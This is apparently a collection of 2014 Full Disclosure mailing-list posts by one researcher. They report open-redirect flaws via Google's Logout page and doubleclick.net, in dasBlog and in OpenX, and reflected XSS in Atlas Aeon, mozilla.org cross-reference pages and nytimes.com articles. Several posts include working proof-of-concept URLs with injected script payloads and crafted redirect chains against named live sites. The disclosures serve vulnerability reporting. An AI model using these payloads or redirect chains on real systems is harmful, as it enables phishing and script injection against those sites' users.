http://googleads.g.doubleclick.net/aclk?sa=Lai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYVnum=0sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQclient=ca-pub-0466582109566532adurl=http://economics.wj.com


POC:
http://googleads.g.doubleclick.net/aclk?sa=Lai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYVnum=0sig=AOD64_2petJH0A9Zjj45GN117ocBukiroAclient=ca-pub-0466582109566532adurl=http://www.tetraph.com/security


[FD] Bypass Google Open Redirect Filter Based on Googleads.g.doubleclick.net

2014-11-14 Thread Jing Wang
Bypass Google Open Redirect Filter Based on Googleads.g.doubleclick.net
http://googleads.g.doubleclick.net/
-- Google Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net
http://googleads.g.doubleclick.net/



The vulnerability exists at Logout? page with continue parameter, i.e.
https://www.google.com/accounts/Logout?service=writelycontinue=https://googleads.g.doubleclick.net



The vulnerability can be attacked without user login. Tests were performed
on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.



(1) When a user is redirected from Google to another site, Google will
check whether the redirected URL belongs to domains in Google's whitelist
(The whitelist usually contains websites belong to Google), e.g.
docs.google.com
googleads.g.doubleclick.net



If this is true, the redirection will be allowed.

However, if the URLs in a redirected domain have open URL redirection
 vulnerabilities themselves, a user could be redirected from Google to a
vulnerable URL in that domain first and later be redirected from this
vulnerable site to a malicious site. This is as if being redirected from
Google directly.

One of the vulnerable domain is,
googleads.g.doubleclick.net (Google's Ad System)




(2) Use one webpage for the following tests. The webpage address is 
http://www.inzeed.com/kaleidoscope;. We can suppose that this webpage is
malicious.



Vulnerable URL:
https://www.google.com/accounts/Logout?service=writelycontinue=https://google.com/



POC:
https://www.google.com/accounts/Logout?service=wisecontinue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.inzeed.com%2Fkaleidoscope



POC Video:
https://www.youtube.com/watch?v=btuSq89khcQfeature=youtu.be



Reporter:
Wang Jing, Mathematics, Nanyang Technological University
http://www.tetraph.com/wangjing





More Details:
http://computerobsess.blogspot.com/2014/11/google-covert-redirect-vulnerability.html

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] CVE-2014-7290 Atlas Systems Aeon XSS (Cross-Site Scripting) Vulnerability

2014-11-14 Thread Jing Wang
CVE-2014-7290  Atlas Systems Aeon XSS (Cross-Site Scripting) Vulnerability


Exploit Title: Atlas Systems Aeon XSS Vulnerability
Product: Aeon
Vendor: Atlas Systems
Vulnerable Versions: 3.6 3.5
Tested Version: 3.6
Advisory Publication: Nov 12, 2014
Latest Update: Nov 12, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-7290
Solution Status: Fixed by Vendor
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]





Advisory Details:

(1) Aeon

Aeon is special collections circulation and workflow automation software
for your special collections library designed by special collections
librarians.

Aeon improves customer service and staff efficiency while providing
unparalleled item tracking, security and statistics.



(2) However, it is vulnerable to XSS Attacks.

(2.1) The first vulnerability occurs at aeon.dll? page, with Action
parameter.
(2.2) The second vulnerability occurs at aeon.dll? page, with Form
parameter.




Solutions:
2014-09-01: Report vulnerability to Vendor
2014-10-05: Vendor replied with thanks and vendor will change the source
code





References:
http://tetraph.com/security/xss-vulnerability/cve-2014-7290-atlas-systems-aeon-xss-cross-site-scripting-vulnerability/
https://prometheus.atlas-sys.com/display/aeon/Aeon+3.6+Release+Notes
http://cwe.mitre.org
http://cve.mitre.org/

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] CVE-2014-7292 Newtelligence dasBlog Open Redirect Vulnerability

2014-10-20 Thread Jing Wang
Exploit Title: Newtelligence dasBlog Open Redirect Vulnerability
Product: dasBlog
Vendor: Newtelligence
Vulnerable Versions: 2.3 (2.3.9074.18820) 2.2 (2.2.8279.16125)
2.1(2.1.8102.813)
Tested Version: 2.3 (2.3.9074.18820)
Advisory Publication: OCT 15, 2014
Latest Update: OCT 15, 2014
Vulnerability Type: Open Redirect [CWE-601]
CVE Reference: CVE-2014-7292
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]




Advisory Details:

Newtelligence dasBlog ct.ashx is vulnerable to Open Redirect attacks.


dasBlog supports a feature called Click-Through which basically tracks all
links clicked inside your blog posts. It's a nice feature that allows the
blogger to stay informed what kind of content readers like. If
Click-Through is turned on, all URLs inside blog entries will be replaced
with URL to your blog/ct.ashx?id=Blog entry IDurl=URL-encoded
original URL which of course breaks WebSnapr previews.


Web.config code:
add verb=* path=ct.ashx
type=newtelligence.DasBlog.Web.Services.ClickThroughHandler,
newtelligence.DasBlog.Web.Services/


(1) The vulnerability occurs at ct.ashx? page, with url parameter.



Solutions:
2014-10-15 Public disclosure with self-written patch.




References:
http://www.tetraph.com/blog/cves/cve-2014-7292-newtelligence-dasblog-open-redirect-vulnerability/
https://searchcode.com/codesearch/view/8710666/
https://www.microsoft.com/web/gallery/dasblog.aspx
https://dasblog.codeplex.com/releases/view/86033
http://cwe.mitre.org
http://cve.mitre.org/

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Mozilla mozilla.org Two Sub-Domains ( Cross Reference) XSS Vulnerability ( All URLs Under the Two Domains)

2014-10-20 Thread Jing Wang
Domains:
http://lxr.mozilla.org/
http://mxr.mozilla.org/
(The two domains above are almost the same)




Websites information:
lxr.mozilla.org, mxr.mozilla.org are cross references designed to display
the Mozilla source code. The sources displayed are those that are currently
checked in to the mainline of the mozilla.org CVS server, Mercurial Server,
and Subversion Server; these pages are updated many times a day, so they
should be pretty close to the latest‑and‑greatest. (from Mozilla)




Vulnerability description:
All pages under the following two URLs are vulnerable.
http://lxr.mozilla.org/mozilla-central/source
http://mxr.mozilla.org/mozilla-central/source


This means all URLs under the above two domains can be used for XSS attacks
targeting Mozilla's users.

Since there are large number of pages under them. Meanwhile, the contents
of the two domains vary. This makes the vulnerability very dangerous.
Attackers can use different URLs to design XSS attacks to Mozilla's variety
class of users.

The vulnerability have been reported to bugzilla.mozilla.org. Mozilla are
dealing with this issue.




POCs:
http://lxr.mozilla.org/mozilla-central/source/body
onload=prompt(justqdjing)
http://lxr.mozilla.org/mozilla-central/source/mobile/android/body
onload=prompt(justqdjing)
http://lxr.mozilla.org/mozilla-central/source/Android.mk/body
onload=prompt(tetraph)
http://lxr.mozilla.org/mozilla-central/source/storage/public/mozIStorageBindingParamsArray.idl/body
onload=prompt(tetraph)
http://lxr.mozilla.org/mozilla-central/source/netwerk/protocol/device/AndroidCaptureProvider.cppbody
onload=prompt(tetraph)


http://mxr.mozilla.org/mozilla-central/source/body
onload=prompt(justqdjing)
http://mxr.mozilla.org/mozilla-central/source/webapprt/body
onload=prompt(justqdjing)
http://mxr.mozilla.org/mozilla-central/source/mozilla-config.h.in/body
onload=prompt(justqdjing)
http://mxr.mozilla.org/mozilla-central/source/chrome/nsChromeProtocolHandler.h/body
onload=prompt(tetraph)
http://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/x86_32_linux_syscalls.h/body
onload=prompt(tetraph)




POC Video:
https://www.youtube.com/user/tetraph




Vulnerability Analysis:
Take the following link as an example,
http://lxr.mozilla.org/mozilla-central/source/chrome/attacktest

We can see that for the page reflected, it contains the following codes.
a href=/mozilla-central/source/chrome/%253Cattacktest%253E
attacktest/attacktest
/a

If we insert body onload=prompt(justqdjing) into the URL, the code
can be executed.




The vulnerability can be attacked without user login. My tests were
performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.


Cross-site scripting (XSS) is a type of computer security vulnerability
typically found in Web applications. XSS enables attackers to inject
client-side script into Web pages viewed by other users. A cross-site
scripting vulnerability may be used by attackers to bypass access controls
such as the same origin policy. (From Wikipedia)




Posted By:
Wang Jing, mathematics student from Nanyang Technological University,
Singapore.
http://tetraph.com/wangjing/




More Details:
http://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/
http://lxr.mozilla.org/mozilla-central/source
http://mxr.mozilla.org/mozilla-central/source

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-2230 - OpenX Open Redirect Vulnerability

2014-10-16 Thread Jing Wang
Exploit Title: OpenX Open Redirect Vulnerability
Product: OpenX
Vendor:  OpenX
Vulnerable Versions: 2.8.10 and probably prior
Tested Version: 2.8.10
Advisory Publication: OCT 8, 2014
Latest Update:  OCT 8, 2014
Vulnerability Type: Open Redirect [CWE-601]
CVE Reference: CVE-2014-2230
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







Vulnerability Details:

OpenX adclick.php, ck.php, vulnerable to Open Redirect attacks.

Source code of adclick.php:
$destination = MAX_querystringGetDestinationUrl($adId[0]);
MAX_redirect($destination);

The MAX_redirect function is bellow,
function MAX_redirect($url)
{
if (!preg_match('/^(?:javascript|data):/i', $url)) {
header('Location: '.$url);
MAX_sendStatusCode(302);
}

The header() function sends a raw HTTP header to a client without any
checking of the $dest parameter at all.


(1) For adclick.php, the vulnerability occurs with dest parameter.


(2) For ck.php, it uses adclick.php file. the vulnerability occurs with
_maxdest parameter.








Solutions:
2014-10-12 Public disclosure with self-written patch.


References:
https://github.com/kriwil/OpenX/blob/master/www/index.php
http://www.tetraph.com/blog/cves/cve-2014-2230-openx-open-redirect-vulnerability/
http://www.openx.com
http://cwe.mitre.org
http://cve.mitre.org/

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] New York Times nytimes.com Page Design XSS Vulnerability (Almost all Article Pages Before 2013 are Affected)

2014-10-16 Thread Jing Wang
New York Times nytimes.com Page Design XSS Vulnerability (Almost all
Article Pages Before 2013 are Affected)


Domain:
http://www.nytimes.com/



Vulnerability Description:
The vulnerability occurs at New York Times’s URLs. Nytimes (short for New
York Times) uses part of the URLs to construct its pages. However, it seems
that Nytimes does not filter the content used for the construction at all
before 2013.

Based on Nytimes’s Design, Almost all URLs before 2013 are affected (All
pages of articles). In fact, all article pages that contain “PRINT” button,
“SINGLE PAGE” button, “Page *” button, “NEXT PAGE” button are affected.

Nytimes changed this mechanism since 2013. It decodes the URLs sent to its
server. This makes the mechanism much safer now.

However, all URLs before 2013 are still using the old mechanism. This means
almost all article pages before 2013 are still vulnerable to XSS attacks. I
guess the reason Nytimes does not filter URLs before is cost. It costs too
much (money  human capital) to change the database of all posted articles
before.




Living POCs:
http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/“img
src=x onerror=prompt(‘justqdjing’)
http://www.nytimes.com/2011/01/09/travel/09where-to-go.html/“img src=x
onerror=prompt(‘justqdjing’)?pagewanted=all_r=0
http://www.nytimes.com/2010/12/07/opinion/07brooks.html/“img src=x
onerror=prompt(‘justqdjing’)
http://www.nytimes.com/2009/08/06/technology/06stats.html/“img src=x
onerror=prompt(‘justqdjing’)
http://www.nytimes.com/2008/07/09/dining/091crex.html/“img src=x
onerror=prompt(‘justqdjing’)
http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html/“img src=x
onerror=prompt(‘justqdjing’)




POC Video:
https://www.youtube.com/user/tetraph




Vulnerability Analysis:
Take the following link as an example,
http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/
“vulnerabletoattack

We can see that for the page reflected, it contains the following codes.
All of them are vulnerable.

li class=”print”
a
href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”vulnerabletoattack?pagewanted=print”Print/testtesttest?pagewanted=print”/a
/li

li class=”singlePage”
a
href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”testtesttest?pagewanted=all”
Single Page/vulnerabletoattack?pagewanted=all”/a
 /li

li a onclick=”s_code_linktrack(‘Article-MultiPagePageNum2′);”
title=”Page 2″
href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”vulnerabletoattack?pagewanted=2″2/testtesttest?pagewanted=2″/a
/li

li a onclick=”s_code_linktrack(‘Article-MultiPagePageNum3′);”
title=”Page 3″
href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”vulnerabletoattack?pagewanted=3″3/testtesttest?pagewanted=3″/a
/li

a class=”next” onclick=”s_code_linktrack(‘Article-MultiPage-Next’);”
title=”Next Page”
href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”vulnerabletoattack?pagewanted=2″Next
Page »/testtesttest?pagewanted=2″/a





The vulnerability can be attacked without user login. Tests were performed
on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.





Cross-site scripting (XSS) is a type of computer security vulnerability
typically found in Web applications. XSS enables attackers to inject
client-side script into Web pages viewed by other users. A cross-site
scripting vulnerability may be used by attackers to bypass access controls
such as the same origin policy.





Reported By:
Wang Jing, mathematics student from Nanyang Technological University,
Singapore.
http://tetraph.com/wangjing/




More Details:
http://www.tetraph.com/blog/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/